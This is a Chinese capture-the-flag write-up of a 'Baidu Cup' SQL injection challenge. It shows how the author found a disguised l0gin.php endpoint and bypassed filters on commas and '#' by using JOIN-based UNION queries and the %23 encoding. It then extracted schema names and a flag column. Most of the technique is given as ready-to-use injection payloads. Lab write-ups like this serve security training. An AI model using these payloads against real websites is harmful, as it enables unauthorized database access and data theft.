“百度杯”CTF比赛 九月场SQLi
数据库注入,无逗号union查询构造
求解流程:
- 进入题目,页面空白,查看源代码
<html>
<head><title>Loading...</title></head>
<body>
<!-- login.php?id=1 -->
</body>
</html>
- 根据提示发送GET请求login.php?id=1
welcome admin~</br>
- 尝试注入,寻找注入点,发送GET请求login.php?id=2
something error~</br>
修改请求,但无论怎么尝试貌似没有用,用sqlmap扫一下,貌似id不存在注入点,没办法,用burpsuite抓包分析一下试试
- 新的请求l0gin.php?id=1(文字游戏真的)
- 寻找注入点
l0gin.php?id=-1’ union select 1,2
注入失败,可以发现过滤了逗号(%2C),通过尝试也发现过滤了#,但是没有过滤其ascii编码%23. - 关键技术:无逗号UNION注入(利用join)
构造注入语句l0gin.php?id=id=-1’ union select * from (select 1) a join (select version() ) b %23,发现注入点,
开始爆数据库,id=id=-1’ union select * from (select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA) a join (select version() ) b %23
之后就简单了,爆表得到users,爆字段得到flag_9c861b688330的属性值,即为flag,
id=-1’ union select * from (select flag_9c861b688330 from sqli.users) a join (select version() ) b %23
总结:
- 注入技巧就是利用union跨表、跨数据库猜解信息,构造的具体注入语句形式类似,内容多样;
- 注意绕过网站的过滤限制,无逗号union查询的构造(利用join);
- 请求重定向是真的骚,这个点比较隐蔽。